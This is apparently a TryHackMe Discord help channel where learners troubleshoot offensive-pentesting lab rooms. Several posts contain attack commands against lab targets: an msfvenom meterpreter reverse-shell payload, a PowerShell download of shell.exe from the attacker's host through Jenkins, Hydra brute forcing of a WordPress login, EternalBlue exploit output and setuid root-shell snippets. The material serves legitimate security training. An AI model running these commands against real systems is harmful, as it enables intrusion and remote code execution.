#offensive-pentesting-path
Rooted this yesterday.
After an hour?
around that yes 😮
Yep, that's known
It's related to Windows licensing.
The creator's gone so it's not really fixable
@ashen hornet is it worth making a note on the room or something for cases like this?
It's the same box every time though, nothing changes.
Keeping good notes should let you get back to where you were very quickly.
yea, I was talking about the box though.
On Retro I'm unable to ||exploit CVE-2019-1388 due to the options for choosing a browser not showing up on the "How do you want to open this website?" window. I started both Chrome and IE before exploiting, to no avail. I tried adding each browser as the default app, and it still won't work||. Does anyone have the same issue?
Here's a screenshot of the issue at hand
I think you have to do it from there: choose an app on this PC and browse the Program Files directory to find the executables of the browsers.
Did the room a couple of days ago, and this is part of the challenge. Though the method you've used prior to executing the binary should work, it doesn't for me either for some reason.
** maybe there’s another exploit that should work…
I am going to start the buffer overflow exploitation rooms but I haven't done much reverse engineering before or played with buffer overflows. Any rooms that could help gain enough knowledge to be able to do them?
You're in for a doozy - hardest shit I've ever done in my life
Here's how I started: https://tryhackme.com/room/win64assembly -> https://tryhackme.com/room/windowsreversingintro -> https://tryhackme.com/room/bof1
And pick up Paul Carter's "PC Assembly Language" -> https://pacman128.github.io/static/pcasm-book.pdf
Thanks, I have done the first 2 rooms before, I'm doing the bof1.
Gave +1 Rep to @vital prawn
I'm having issues with overflow5. I have the correct bad characters but it says incorrect.
not sure
Tib3rius made the Windows and Linux priv esc rooms and a buffer overflow room.
q
Guys
Which one is more helpful in hacking: Bash or Python? Or is there any other programming language that is better for hacking?
Both
anyone else unable to RDP into the AD machines (at least post-exploitation basics and attacking kerberos) with xfreerdp? I can get in fine with rdesktop as CONTROLLER\Administrator but I can't get in with, e.g., "xfreerdp /u:CONTROLLER\Administrator /p:P@$$W0rd /v:10.10.225.236" (even with /d domain flag)
try this:
xfreerdp /u:Administrator /p:'P@$$W0rd' /v:10.10.225.236
Gave +1 Rep to @fathom marten
👍
In the Internal room created by The Mayor I brute forced the password for the WordPress site, but when I try to log in to <ip>/blog/wp-login.php I get forwarded to internal-thm/blog/wp-login.php, which I am unable to connect to.
Is this part of the room or is there something wrong with my connection?
you have to add the hostname in your /etc/hosts
10.10.x.x internal.thm
is this mentioned anywhere in the room?
thank you
Gave +1 Rep to @fathom marten
I'm having issue with the last task in the Steel Mountain Room. I can get nc.exe to download via the python web server, but running the exploit again and again does not pop a shell. I've gone through multiple walkthroughs and none of them help.
@lean patio downloading nc.exe, are you sure you read correctly? I don't remember seeing this.
yeah, you have to download nc.exe to the vulnerable box first then after you run the exploit again to pop a shell...i was wgetting the html file instead of the binary
Are you using the exploit? If so, remember that it tries to get netcat from port 80, and Python http opens on port 8000 by default.
Do you get a connection for your http server?
If not you will have to modify the script, as port 80 is already busy in the THM attackboxes
Hi. I'm on the Post-Exploitation Basics room of the OPT path. In order to secure-copy the zip file to my machine I need the password for my Kali VM. Is there a default password for that?
Hello,
I met some problems in Intro to C2 room
I need to configure what IP address in Armitage ?
Hi Guys, is the Path "Offensive Pentesting" current or obsolete or replaced by "Jr. Pentesting"?
Both are different paths
But different content, quite dramatically
It's not been announced that this path is being replaced or deprecated, so assume that it is not for now.
Yep, it was meant to be removed but they have not yet
Are you the only one who sees the status? Because I don't see anywhere that it says deprecated.
There was an email that went out
To nearly everyone, IDK why a lot of people didn't seem to get it
@ashen hornet This path really needs to obviously indicate that it's deprecated
Hi, I am having an issue in the machine Kenobi. When I mount the folder and try to cat or copy the id_rsa file, the terminal gets stuck and I can't do anything. I have tried terminating the machine and everything but I can't get the id_rsa file.
Am I doing something wrong?
I'm having a problem with finding the correct EIP offset for BOF 2 in Buffer Overflow Prep. There is always an additional 4 bytes to my result compared to the writeups and I can't figure out where I'm going wrong...
Hi, I am stuck with impacket in the Active Directory lab. When I use GetNPUsers.py I get the "Domain should be specified!" error, even when I try to add the .local at the end like GetNPUsers.py -request -no-pass -usersfile ~/userlist.txt -dc-ip 10.10.104.43 -format hashcat THM-AD.local.
I have the same issue 😮💨
Maybe you are browsing something that is out of scope.
Is your problem solved ?
heyy guys, is it normal that in "advanced exploitation" there's the 'Overpass 2 - hacked' room w/o having done the first one?
Yes
Is there any way to list payload options in msfvenom?
show payloads
I mean the options of a specific payload such as windows/meterpreter/reverse_tcp. How can I show its options using msfvenom, not msfconsole?
The first result after trying to google should have revealed that 🙂
It's --list-options in case --payload-options is not working
I'm sorry
I already tried to search for an answer but I didn't find one
This is where I searched for https://www.offensive-security.com/metasploit-unleashed/msfvenom/
Thank you
Hello, I am on the Alfred room and I can't understand how to exploit SeImpersonatePrivilege to do a privesc. I understand the SeDebugPrivilege one though
Can someone help please?
|| A potato || ?
I often Google for "TheThingIWantToExploit Exploit Github" and get good results. I think you will too.
I've never managed to get the potato exploits to work but this one works for me on a few machines.
Hi there! For 3 days I've been trying to get Gatekeeper done and no success. :/ Before attacking the THM IP I was doing the exploit locally. Today, I checked some write ups and ended in the same way but still no luck with the reverse shell.
any light on this chaps? I'm totally blocked :/
This is my current script.
The thing is, when running locally, Immunity Debugger gets paused.
If I click play again to continue
then I press nope and then I get a shell.
Any idea on this chaps? Thanks!
So my bet is something in my script. Obviously trying this in the THM room I never get a shell as I can't press play 😛
Forget it, 2 JMP addresses and was trying the wrong one
Guys, I have a small doubt; help me with these scripts.
I wanted to make a simple root shell script and tried creating it in Python and C... but the Python script is not working...
This is the Python one:
```python
#!/usr/bin/python
import os

# Switch to UID/GID 0 before spawning the shell. setuid(0) only succeeds
# if the process is already root: Linux ignores the setuid bit on scripts.
os.setuid(0)
os.setgid(0)
os.system("/bin/bash")
```
This is the C one:
```c
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* Same idea as the Python version: needs root or a setuid-root binary. */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
```
So even if the script is run with root privileges, we can't execute the script???
In the Brainpan room, I don't really understand something. (I've done the room)
Knowing that the program runs on Wine on Linux, it's understandable how I would get a Windows shell if I use a Windows payload since it's kind of getting emulated. 😮 But how does using a Linux shell payload work? Like it's still running as a Windows program.
Hi, I am currently in the Internal room and I am using the AttackBox. I tried logging in to the WordPress login page but when I press login it redirects to internal.thm, which results in a site not found screen and not logging in. Am I doing something wrong or is something else wrong?
Going through the Kenobi room, and I've gotten the id_rsa key. I know we can SSH in because we saw the users directory was 'Kenobi', but I'm curious if there's a way to enumerate valid usernames if you have the private key? msf doesn't seem to have anything like that
You could brute force usernames with the key, metasploit can do that. I wouldn't say it's a good idea.
Hi guys, I am stuck in Overpass 2. When I am trying ssh on port 2222 it's saying "unable to negotiate with <IP> port 2222: no matching host key type found. Their offer ssh-rsa". I have googled it but I am not getting anything
Google definitely has solutions for this, just adding a flag to ssh.
I know for certain google has the answer.
Ok
Solved thanks
Hey, just saw you are the creator of that room.
It was really good learning and a fun machine. I have a question: can we expect this kind of machine or forensics in the OSCP exam or was it just for learning?
Helloo, I've got a problem in the "brainstorm" room
The answer in the first task is "open ports: 6" and I thought I was using a wrong setup for nmap, but looking also at writeups etc., everyone found only 3 open ports. Why is that?
maybe they counted UDP ports but it's honestly irrelevant to the actual room
Oh I think I got it, ||PrinterSpoofer||
(Y)
Do you mind expanding on that? I couldn’t find an SSH module that looked promising. Also, why isn’t it a good idea? Seems better than bruting valid SSH usernames
Because it's still brute force?
What do you mean by bruting valid ssh usernames?
I think it's the newbie in me, but I'm assuming that enumerating SSH users is just finding what users exist on the machine, whereas I'm assuming that if I was enumerating for users and had a private key I'd be able to identify which user the key belonged to
You can't do username enumeration
Those are recognised as serious vulnerabilities and are immediately fixed.
Understood, I saw that in one of the machines yesterday as every response was a false positive, removing that threat vector
You'll also notice it's for ancient versions of ssh
But that’s why I was asking in the first place. If enumerating users isn’t a viable path, but appending the private key would give us a valid login if the username was correct no?
What do you mean?
Hi
Anyone here?
My Immunity Debugger shows C2 after 7f
In the BOF room
Unable to find badchars
Does somebody know why in Overpass 2 we are working with Wireshark? Until now I didn't see anything about it and this challenge requires knowing Wireshark... thinking if I forgot some path...
James could answer your question the best I think.
When The Mayor from TCM helped revamp the path, he put it in there.
You can learn wireshark
then it should recommend Wireshark and CC Pentesting and Linux before doing the room, I think...
#feedback-and-ideas but cc pentesting is private.
And yeah, the linux content is already in the path before surely?
yeah, Linux is in the path before... then it would be nice to recommend doing Wireshark before Overpass 2. Thank you for your answers, nice support!!!
Gave +1 Rep to @keen iris
Remember that moderators are not tryhackme staff, and are especially not tryhackme support staff
What do you mean by that? I'm new on Discord and don't understand some stuff... sorry if I made some mistakes
Moderators are not tryhackme staff
Hi guys, I am currently experiencing an issue with Offensive Pentesting -> Alfred (Jenkins) Room.
But before I go any further, I first need to verify if I'm using the correct IP addresses (my IP vs target IP).
So I create the app (.exe) that I'll make the target download from my device.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[MY IP] LPORT=4242 -f exe -o [SHELL NAME].exe
In Jenkins under Build -> Windows Command, so when I run a build it downloads the file (.exe).
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<My IP>:4242/shell-name.exe','shell-name.exe')"
Then I use Metasploit
msfconsole
exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <My IP>
set LPORT 4242
run
Is this correct?
Because I keep getting this
Okay. I think I understand where I made the mistake.
Get the powershell reverse shell, and use that to download and run the meterpreter binary
Gave +1 Rep to @keen iris
```
[*] Started reverse TCP handler on 172.25.53.79:4444
[*] 10.10.124.252:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.124.252:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.124.252:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.124.252:445 - The target is vulnerable.
[*] 10.10.124.252:445 - Connecting to target for exploitation.
[+] 10.10.124.252:445 - Connection established for exploitation.
[+] 10.10.124.252:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.124.252:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.124.252:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.124.252:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.124.252:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.124.252:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.124.252:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.124.252:445 - Sending all but last fragment of exploit packet
[*] 10.10.124.252:445 - Starting non-paged pool grooming
[+] 10.10.124.252:445 - Sending SMBv2 buffers
[+] 10.10.124.252:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.124.252:445 - Sending final SMBv2 buffers.
[*] 10.10.124.252:445 - Sending last fragment of exploit packet!
[*] 10.10.124.252:445 - Receiving response from exploit packet
[+] 10.10.124.252:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.124.252:445 - Sending egg to corrupted connection.
[*] 10.10.124.252:445 - Triggering free of corrupted buffer.
[-] 10.10.124.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.124.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.124.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.124.252:445 - Connecting to target for exploitation.
[+] 10.10.124.252:445 - Connection established for exploitation.
[+] 10.10.124.252:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.124.252:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.124.252:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.124.252:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.124.252:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.124.252:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.124.252:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.124.252:445 - Sending all but last fragment of exploit packet
[*] 10.10.124.252:445 - Starting non-paged pool grooming
```
Hi people, I'm in the Mr Robot room. Does somebody know what's wrong here? It finds a user that is wrong.
hydra -L fsocity3.dic -p test 10.10.36.35 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.36.35%2Fwp-admin%2F&testcookie=1:Invalid username." -F
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-19 01:17:58
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://10.10.36.35:80/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.36.35%2Fwp-admin%2F&testcookie=1:Invalid username.
[STATUS] 761.00 tries/min, 761 tries in 00:01h, 10691 to do in 00:15h, 16 active
[STATUS] 316.33 tries/min, 949 tries in 00:03h, 10512 to do in 00:34h, 7 active
[80][http-post-form] host: 10.10.36.35 login: 20that password: test
[STATUS] attack finished for 10.10.36.35 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-19 01:22:21
should be elliot and it finds 20that
Are you aware that you specified fsocity.dic as the username wordlist and test as the password to try?
Rather than using fsocity.dic as the password list and specifying the username you want to bruteforce that list for?
well, I want to bruteforce the username... to then, when I get it, bruteforce the pass
Okay? But how do you want to do that with a wordlist that most likely only contains possible passwords?
uhum... should I try rockyou.txt instead?
Well rockyou is also a wordlist containing possible passwords, so I doubt it has the correct username in it.
But you could either use a username wordlist and check if the correct username is in it, or just make a custom wordlist and add the correct username to that list, if your goal is to simply try if you can bruteforce the username with hydra
got it! I've already done this by checking the hash from the path /license but I wanted to know how to do it with hydra. Thanks a lot!!!🥳
Gave +1 Rep to @dense gate
nc my machine ip 1337 | Buffer Overflow Prep, it doesn't work
Your LHOST value is incorrect
I'm trying to connect to RDP via xfreerdp and I'm getting the below error
```
[06:47:19:801] [51752:51753] [ERROR][com.freerdp.core] - transport_ssl_cb:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_CERTAINLY_EXPIRED [0x0002000F] [06:47:19:801] [51752:51753] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:14094438:SSL routines:ssl3_read_bytes:tlsv1 alert internal error
```
Try a different client
The official Microsoft Windows rdp client
oh
I finished Alfred and the hardest part of this room was just finding a user/password file combination to use with hydra to get into Jenkins... Like this took me hours... trying to use rockyou.txt until I just stopped and used unix passwords.txt
Is there a better way to go about finding the proper users/passes for these rooms?
hydra/hashcat also tend to give me a hard time, a lot of times. i think it's normal.
Hydra failed me on Mr. Robot. For days on end, repetitive "Add 1 Hour"s, constant restarting, running out of time, restarts, running out...
i don't know if it's an issue with "weak hardware" or not.
i know for crypto, it can be, but with brute-forcers I'm not sure
i would think not, seeing it's not "cracking" anything. it's just running through words in a list and making http requests...
but what do I know...
eventually i just cracked and said "f#ck you, hydra"... went and simply looked up the password.
more like "f#ck you, laptop", but still .. took my anger out on Hydra for it
Wait, what? You are brute forcing creds on the Mr Robot room? If yes, then the credentials are stored on the web server; you have to enum harder and see everything that your dir bruteforces give you (:
that's odd...
I've seen 6 write-ups that also use brute forcing.
i found fsocity.dic. That was the wordlist used. There wasn't much else.
I don't think you have to bruteforce. Not sure, but I found creds on the website
On different page
everyone I've read (and watched) simply runs hydra with the dictionary file and they've got it to work.
I'm wondering where this "page" is you're talking about. I was pretty thorough and recursive with the dirbuster scan...
maybe it's buried deeper than I thought? I'll have to test that out again, eventually.
hmm...
I need a sanity-check, now. You just turned my world upside down with that info....
can anyone else confirm/deny??
I'm not going to be able to sleep over this haha

i let dirbuster run for quite a bit of time.... maybe "not long enough".
Check ||license.txt||, whole source code
Hi, attempting the Brainstorm room
my ftp says entering extended passive mode and I can't list anything
but writeups say otherwise
anyone know what's the issue?
Run binary in the ftp terminal to go into that mode; you can also do passive.
If all else fails just download from the AttackBox and transfer to your own machine (it's what I did)
Hi. I am trying to use my local host Windows OS as a target, and my VMware Kali Linux as an attacker. I used the same for Brainstorm and it worked well, but on Gatekeeper I receive:
```
┌──(root㉿kali)-[/home/kali/Documents/THM/GateKeeper]
└─# python3 fuzzer.py
Fuzzing with 100 bytes
Could not connect to 192.168.8.1:31337
```
check the vm network settings
I remember having a similar issue but I can't remember what the solution was
What should I look for in VM settings?
do u have ethernet or wireless?
Wireless
@mystic summit My options are:
```
- Bridged: Connect directly to the physical network.
- NAT: Used to share with the host network.
```
Ping result:
```
--- 192.168.8.1 ping statistics ---
10 packets transmitted, 10 received, 0% packet loss, time 9064ms
rtt min/avg/max/mdev = 0.599/0.768/0.939/0.098 ms
```
try now with the fuzzer idk
Same result
```
┌──(root㉿kali)-[/home/kali/Documents/THM/GateKeeper]
└─# python3 fuzzer.py
Fuzzing with 100 bytes
Could not connect to 192.168.8.1:31337
```
No. I have always used NAT. It's the default setting.
should be. nmap says it is. But let me check with my cmd.
maybe the python script?
If it was the script the error would show. But it only says Could not connect to 192.168.8.1:31337
See! The nmap works fine
```
┌──(root㉿kali)-[/home/kali/Documents/THM/GateKeeper]
└─# nmap -sS -sV 192.168.8.1 -p 31337
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 19:02 EDT
Nmap scan report for 192.168.8.1
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
31337/tcp open Elite?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:50:56:C0:00:08 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.02 seconds
```
@mystic summit What do you mean by 'no nvm'?
"no nevermind"
@hidden shoal
```python
for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        print("Fuzzing with %s bytes" % len(string))
        s.send(string + "\r\n")
        data = s.recv(1024)
        s.close()
    except:
        # bare except: every error raised above, not only a failed connect, lands here
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
```
if there are any type of errors it prints "could not connect to..." right?
That's right! The other way would be too detailed and complicated.
Is there an online windows OS I can try my codes on?
Or would it make any difference if I use the Attack Box?
That's what I'm doing now!
This is still an issue that hasnt been updated
Hmmmmm isn't the password the default one? I don't recall using hydra for the Alfred room
the only combination I could find for the Jenkins default password was admin/password and that didn't work
I think it is good practice to try admin:admin and admin:password root:root and admin:root
yeah for sure, still pretty new
Sure np, I am a newb too but I got lucky
Hi guys, I'm on the machine RELEVANT and when I try to get into the SMB without a pass it doesn't work, any help?
❯ smbclient \\10.10.120.93\nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.120.93 failed (Error NT_STATUS_IO_TIMEOUT)
I've tried the two passwords that I found in passwords.txt just in case but it doesn't work... @hidden shoal or @keen iris can you help me?
Hi. I have a question. A guy entered our Discord server and somehow hacked it by giving himself roles and deleting people
Is there any way I can get his IP without the need of a link or image?
@silk needle why do you want their IP?
To maybe get him to leave the server
Not gonna do anything further than that
Why would that work?
By threatening him
Then they can't leave. We're not going to help you do something unethical
And he's kicking and banning people out of the server
Contact discord support
K ty anyways ig
Gave +1 Rep to @keen iris
-ban @silk needle Asking for IP grabbers to scare someone on discord, unethical
🔨 Banned LoneSwordsman#9420 indefinitely
You're welcome
I found the same thing. Only 3 tcp ports open. Didn't scan udp.
Heyy, I'm having problems with dropping the .zip file in bloodhound (for the "Post_exploitation Basics" room in Active Directory section)
It says that "BAD JSON FILE" for both the .zip file and the .json files in the folder (I also tried to drop them directly but it says "file created from incompatible collector" ---> maybe window's bloodhound's version is different and it collects data in other incompatible format than the ones that newer versions use?)
Yeah you need to use an older version of bloodhound for it to work
I have a question. https://tryhackme.com/room/basicmalwarere , what software should I use to get the MD5 hash from the files downloaded in this task?
on Linux there are tools for that, named like md5sum
Thank you Shadow_absorber
Gave +1 Rep to @vernal mason
nice... and yeah there are a decent bit of hash calculating binaries for linux to help with this
Shadow_absorber, what I wanted was the MD5 hash. I used a hex editor; I will also look at md5sum.
Hello! I am new in here so if this isn't the right channel, please let me know. I am working on Buffer Overflow Prep room for the OSCP, and I had a question regarding the exercises, specifically, the question " What is the EIP offset for OVERFLOW3?". This isn't specific to OVERFLOW3, but I've noticed that the EIP offset within Immunity Debugger seems to be the value found at "ESP (xxxx) points at offset XXXx in normal pattern (length 111)" line since submitting the EIP offset tells me it is incorrect, and only accepts the ESP offset. Anyone that might be able to explain this? Shouldn't it be the actual offset for the EIP, like the line that says "EIP contains normal pattern : xxxx (offset 1234)"? When looking at different blogs, they all seem to be referring to the actual EIP line rather than the ESP line (e.g., https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst).
Hello, I am new here as well, just started the offensive pentesting path,
sorry, hit send accidentally
Hello, I am new here as well, just started the offensive pentesting path. I am on task 1, step 2, and it asks you "to type the following command into the terminal", then it shows a screen with code. Do I type this whole screen with every ===? Looks like a lot and I am having a hell of a time counting them. I tried writing it all down but it's not working; my spaces are off but that wouldn't make the code not run, would it?
Task 1 step 2 of which room?
@turbid cradle Intro to Offensive Security, Jr Pen Tester
No, just the first line is the command: gobuster -u http://fakebank.com -w wordlist.txt dir
thanks so much @dense gate, a lot easier than what I've been trying to do. Don't know how I missed that.
Gave +1 Rep to @dense gate
Any good tutorial with all options of nuclei? Pls don't point me to the MD path
issue on the Alfred room
I've done this and it's already downloaded the file
but it's not executing it?
Check the output in Jenkins
it's just showing the whoami
also I tried changing the port and re-applying and saving it but it won't let me
this is what happens when I try to save
applying doesn't work either
it seems to let me apply and save it now but
not getting a hit on my http server
same issue again if I try applying again
dude
I'm so stupid lmao, that was when I checked if the file was available
Ok, in the pins in #site-support there is an MTU fix. Try that.
MTU?
i see it
it fixed the issue of "connection was reset" but I'm still not getting any hits on my http server
this looks right to me tho
Look at the build job output
That's going to be for an old version?
Hi people, doing RELEVANT and I cannot enter the SMB without a password when in the video it shows it doesn't need one... any suggestion??
❯ smbclient //10.10.182.73/nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)
❯ smbclient \\10.10.182.73\nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)
Hey guys, I was doing Game Zone and I am not able to understand how the Reverse SSH Tunneling concept is applied in Task 5 and also It says service running on Port 10000 is blocked via firewall but how do we know it's blocked actually.
Can someone help me with this?
well, can you access the service from outside/your_attacking_machine directly?
Sorry about the wording of my question 😅... actually in the task it says "we can see that the service running on port 10000 is blocked via a firewall rule from outside (we can see this from the iptables list)". Is there any way that we can see in the target machine which ports/services are blocked?
!docs verify
some ports can show up filtered/closed (read through the nmap guide for more info) but we can't see 'em most of the time
ok..thanks
Getting ampersand not allowed in Alfred room while running Invoke-Expression.ps1
http.server is working fine but not getting any response in nc listener
Can anyone help me out, please?
Hi @hidden shoal! Does the Buffer Overflow Prep room teach us what a buffer overflow is or just how to hack it? Is there any room where to learn buffer overflow from the beginning?
also I'm getting an error trying to connect with xfreerdp
❯ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.148.29 /workarea
[14:17:38:505] [39923:39924] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[14:17:38:505] [39923:39924] [ERROR][com.freerdp.core] - failed to connect to 10.10.148.29
Learn computer organisation and it gets easier
hahahahaha sorry!!!!
that is a walkthrough?
well, it seems there is a Buffer Overflows room for basic understanding that leads me to the Intro to x86-64 room (but this last one is private sh**)
None of those are what I recommended
then shouldn't I start from THM?
Personally I wouldn't, because computer organisation is a computer science topic
Hacking builds on computer science and IT
ok, got it... will search for information about computer organisation. thanks!
Gave +1 Rep to @keen iris
jr pentester > offensive pentester
or
Basic > jr > offensive
Lol, that moment when you're not sure if it's an arrow or a greater than. Jr then Offensive isn't bad. Basic is deprecated, so most don't see a reason to do it. Jr Pentester to PenTest+ to Offensive Pentester is also an option.
Thanks.
Ser, it was a greater than... just kidding 😅
I ran gobuster dir -u http://fakebank.com -w /home/roki/wordlists/directory-list-2.3-medium.txt and can't seem to find the 'bank-transfer' page as instructed in TASK 1 of the Intro to Offensive Pentesting room.
These are my results all the time with different wordlists tried:
have you used the correct wordlist (that's mentioned in the room possibly)?
👀
oh lmao, it's literally a fake bank website
wth???
That was clearly unintentional!!
I did not mean to!!
I'm a bit confused? 🤔
It's just for show.
It's stated there, so I copied what I saw! I sincerely apologize for this.
wow
So I was clearly scanning that domain illegally.
they have my IP now
Okay, thank you lassi!! Definitely eased my mind.
Gave +1 Rep to @hidden shoal
Okay, so I still get the same results with the IP address
Also, I have already tried different wordlists and even the wordlists they have provided.
Going to restart my machine.
Got it! This is why i was confused
I misread, as I tend to skim through this a lot.
I'm supposed to use their machine.
Hey guys, I need some help here. I'm currently doing the OSCP BOF Prep room. My RDP session gets disconnected often, like once every 5 minutes.
My network connection is stable and I'm connected to the VPN too.
What am I doing wrong?
That's not how you connect to smb share with username.
I'd recommend reading this first:
https://www.samba.org/samba/docs/current/man-html/smbclient.1.html
Alternatively, type smbclient --help in your terminal and press enter.
Ohh
I'm doing the Brainstorm room. When I try to attach the exe file to the immunity debugger and run, I was not able to run it. It is still in the paused mode. And when I tried to run the file alone, nothing is showing up.
Did you try on a local Win machine?
Overpass2: I can't connect for some reason.
Google the error message.
Yes I did on a VM. I'm using Mac M1 and used Win 11 for running the application. Tried the compatibility mode for Win 7 but it did not work.
Hey all, I've come across an issue during my engagement on Relevant. Two of the SMB shares (IPC$ and nt4wrksv) are open, so they don't require credentials to access.
According to many walkthroughs (I hated checking them out cuz I wanted to do it all by myself), the machine is supposed to be vulnerable to MS17-010 (EternalBlue), which I confirmed from the Nmap vuln scanning, but it doesn't seem to be working when tested out with various exploits found online such as AutoBlue, zzz_exploit.py, etc. They all kinda led to ACCESS DENIED. I tried to open up the exploit and see what's going on, but no luck..
Can someone tell me what's going on? Let me know if you need some more info
Can't connect for some reason.
have you added the ip in /etc/hosts?
No, I didn't know I had to do that.
internal.thm isn't a real domain name 🙂
Yeah, I'm stupid.
I can't update the file, brah.
Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.
I keep getting this error when I try to upload a rev shell.
Try to upload the file in a different theme.
Hello All,
I'm currently doing Alfred and for some reason my meterpreter shell is being dropped immediately. Anybody run into the same problem? I have seen some alternative methods, but would like to get the intended path working for good practice
On the Jenkins build config I have tried the following bash:
powershell -c Start-Process "shell.exe" (also with 'powershell.exe' and with/without '-c')
otherwise all other lines of code they provided were fine, including the windows/meterpreter/reverse_tcp payload and the shikata encoding methods.
Should I just bite the bullet and use web delivery?
You are catching it with multi/handler, right?
yes
And you set the payload of multi/handler to the exact same payload as for your rev shell?
Yes, I just double checked.
May I ask what the exitfunction is? Perhaps this? I saw someone online include this as 'thread' in their msfvenom, but it's not listed in the steps.
mine is currently set to process
You would have to look it up, but the default setting usually should be fine.
But yeah, try to change it and see what happens.
Other than that I'm not sure what the issue might be. Have you tried restarting the target machine already?
No problem, thanks for the thoughts anyway. Yeah, I've been back to the task a few times now actually. I should move on I guess and just use the web delivery method (seems to be OK).
Gave +1 Rep to @dense gate
Yeah, maybe it's just some sort of connection issue.
One quick thing to try would be sudo ip link set dev tun0 mtu 1200 to see if that changes anything, if it doesn't just put it back to 1500
I just finished using the web delivery module of Metasploit. I'd be curious what the difference in payload was. Kinda why I avoid Metasploit, you know? Sometimes it feels like you did something, but didn't learn how it happened.
on to hackpark ;D
This happens because maybe you have configured another IP address in the SSH config.
This can solve the issue.
Hello guys, I'm on the Brainstorm room. I'm trying to load the exe in Immunity Debugger but I have a message saying it cannot load a 16-bit application. How should I proceed ?
I'm on Win10 x64, I tried to enable 16-bit app but I don't have the NTVDM feature available...
Make sure you have the associated DLL in the same dir as the exe, but I used a Windows 7 VM (the Blue machine on THM, https://tryhackme.com/room/blue) to get it to work, by installing everything on it.
I have the dll in the same folder but it's not working. I'm also gonna use a VM from another room. I would have liked to understand how to do it on my machine but anyway ^^
Yeah, you can use the already installed Immunity Debugger from the Buffer Overflow Prep room. Somehow I didn't think of it at the time, and it's a system architecture thing afaik.
Ok, that's what I'm doing right now. Thanks for the answer.
Gave +1 Rep to @fathom marten
Hi, I'm on the buffer overflow room and
overflow1 was fine, but
when I try overflow2
the EIP isn't showing up.
I redid it a couple of times but I still can't find it.
Man,
buffer overflow is too confusing.
Anyone know how to exploit EternalBlue? Port 445 is closed.
Hey, is this path good for OSCP?
I mean, will I be able to pass OSCP after completing this path?
No, you should complete Pen-200 and as much of the coursework, extra miles, and labs as you can
Is this related to a room on the path?
Mr Robot is a great room, but whatever bastard made the wordlist 800,000 words long is a genius/villain.
I literally figured out the hint 17 mins into the brute force, and got it at the exact same second the brute force did.
Note - don't miss obvious things like scrollbars in your browser OR use curl more
Need help with msfvenom.
